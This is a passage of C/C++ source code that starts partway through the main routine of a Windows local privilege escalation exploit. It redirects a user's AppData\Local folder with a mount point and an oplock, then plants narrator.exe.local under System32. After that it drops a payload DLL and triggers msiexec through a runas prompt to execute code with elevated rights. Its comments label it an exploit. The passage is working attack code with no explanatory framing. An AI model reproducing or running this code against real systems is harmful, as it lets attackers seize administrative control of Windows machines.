	happdata_local = op.OpenDirectory(appdata_local, GENERIC_READ | GENERIC_WRITE | DELETE);
	if (!happdata_local)
		err(L"OpenDirectory", op.GetLastErr(), __LINE__);

	// Now create a mount point between C:\\Users\\TEMP.WIN11-TEST.016\\AppData\\Local that points to C:\\Windows\\Temp\\{CC9BF9F3-5B31-47E4-8C61-49E609D7A2CE}
	if (!op.CreateMountPoint(happdata_local, __tmp))
		err(L"CreateMountPoint", op.GetLastErr(), __LINE__);

	// Once the mount point has been created between C:\\Users\\TEMP.WIN11-TEST.016\\AppData\\Local and C:\\Windows\\Temp\\{CC9BF9F3-5B31-47E4-8C61-49E609D7A2CE},
	// create an oplock on the C:\\Users\\TEMP.WIN11-TEST.016\\AppData\\Local directory and wait until its triggered, then use callback1 function
	// to do operations when lock is triggered.
	op.CreateAndWaitLock(happdata_local, callback1);

	// Check if the lock on C:\\Users\\TEMP.WIN11-TEST.016\\AppData has been hit or not.
	// If not then wait for the lock to be hit, and once its hit then delete the lock.
	if (appdata_lock) {
		appdata_lock->WaitForLock(INFINITE);
		delete appdata_lock;
	}

	// Wait for the thread that tries to create a new msiexec.exe process with the
	// provided credentials for the other user to finish and end up becoming signaled,
	// then close the handle to the thread to shut it down.
	WaitForSingleObject(hthread, INFINITE);
	CloseHandle(hthread);

	// Check if we were actually able to create C:\\Windows\\System32\\narrator.exe.local.
	// If we failed, then the exploit failed.
	if (GetFileAttributesW(L"C:\\Windows\\System32\\narrator.exe.local") == INVALID_FILE_ATTRIBUTES) {
		MessageBoxA(NULL, "Couldn't get narrator.exe.local!", "fail!", MB_OK);
		MY_PRINTF(L"Exploit failed - Creating C:\\Windows\\System32\\narrator.exe.local was unsuccessful! Error: %i\r\n", GetLastError());
		return 1;
	}

	// Remove the directory at C:\\Windows\\Temp\\{CC9BF9F3-5B31-47E4-8C61-49E609D7A2CE}
	if (op.RRemoveDirectory(__tmp) == FALSE) {
		MY_PRINTF(L"Was not able to delete the %s directory before dropping the payload! Error: %i\r\n", __tmp, op.GetLastErr());
		ExitProcess(30);
	}

	// Sleep for 5 seconds to allow things to finish doing what they need to. XXX Still not 100% sure this is needed.
	Sleep(5000);

	// Close the handle to the C:\\Users\\TEMP.WIN11-TEST.016\\.lock file.
	CloseHandle(hlock_file);

	// Create the directory at C:\\Users\\TEMP.WIN11-TEST.016\\\AppData\\Local\\Application Data
	int dir_cr_appdata_result = SHCreateDirectory(NULL, appdata_local_appdata);
	if (dir_cr_appdata_result != ERROR_SUCCESS) {
		MY_PRINTF(L"Was unable to call SHCreateDirectory to create the directory at %s! Error was: %i\r\n", appdata_local_appdata, dir_cr_appdata_result);
		ExitProcess(31);
	}

	// Drop the payload file at
	DoDropPayload(dllPath);

	// This will cause the system to open a RUNAS prompt which will trigger the LPE code execution.
	HINSTANCE result = ShellExecuteW(NULL, L"runas", L"C:\\Windows\\System32\\msiexec.exe", NULL, NULL, SW_NORMAL);
	if ((INT_PTR)result < 32) {
		ExitProcess(1000);
	}
	/* Uncomment this if you want to debug why the exploit is failing.
	else {
		switch ((INT_PTR)result) {
		case 0:
			MessageBoxA(NULL, "Out of resources!", "ERROR!", MB_OK);
			break;
		case ERROR_FILE_NOT_FOUND :
			MessageBoxA(NULL, "File not found!", "ERROR!", MB_OK);
			break;
		case ERROR_PATH_NOT_FOUND:
			MessageBoxA(NULL, "Path not found!", "ERROR!", MB_OK);
			break;
		case ERROR_BAD_FORMAT:
			MessageBoxA(NULL, "Bad format!", "ERROR!", MB_OK);
			break;
		case SE_ERR_ACCESSDENIED:
			MessageBoxA(NULL, "Access denied!", "ERROR!", MB_OK);
			break;
		case SE_ERR_ASSOCINCOMPLETE:
			MessageBoxA(NULL, "The file name association is incomplete or invalid!", "ERROR!", MB_OK);
			break;
		case SE_ERR_DDEBUSY:
			MessageBoxA(NULL, "The DDE transaction could not be completed because other DDE transactions were being processed!", "ERROR!", MB_OK);
			break;
		case SE_ERR_DDEFAIL:
			MessageBoxA(NULL, "The DDE transaction failed!", "ERROR!", MB_OK);
			break;
		case SE_ERR_DDETIMEOUT:
			MessageBoxA(NULL, "The DDE transaction could not be completed because the request timed out.", "ERROR!", MB_OK);
			break;
		case SE_ERR_DLLNOTFOUND:
			MessageBoxA(NULL, "The specified DLL was not found!", "ERROR!", MB_OK);
			break;
		case SE_ERR_NOASSOC:
			MessageBoxA(NULL, "There is no application associated with the given file name extension. This error will also be returned if you attempt to print a file that is not printable.", "ERROR!", MB_OK);
			break;
		case SE_ERR_OOM:
			MessageBoxA(NULL, "There was not enough memory to complete the operation.", "ERROR!", MB_OK);
			break;
		case SE_ERR_SHARE:
			MessageBoxA(NULL, "A sharing violation occurred.", "ERROR!", MB_OK);
			break;
		default:
			MessageBoxA(NULL, "Unknown error occured!", "ERROR!", MB_OK);
			break;
		}
	}*/

	CloseHandle(result);

	// Remove the directory at C:\\Windows\\Temp\\{CC9BF9F3-5B31-47E4-8C61-49E609D7A2CE}
	op.RRemoveDirectory(__tmp);

	// Call rev2self to get back original token, then clean up all the handles and heaps.
	RevertToSelf();
	CloseHandle(huserdat);
	CloseHandle(husers_dir);
	CloseHandle(happdata);
	CloseHandle(hlnk);
	CloseHandle(_token);
	HeapFree(GetProcessHeap(), NULL, user_temp_dir);
	HeapFree(GetProcessHeap(), NULL, fni);
	HeapFree(GetProcessHeap(), NULL, lock_file);
	HeapFree(GetProcessHeap(), NULL, appdata);
	HeapFree(GetProcessHeap(), NULL, appdata_local);
	HeapFree(GetProcessHeap(), NULL, appdata_local_appdata);
	return ERROR_SUCCESS;
}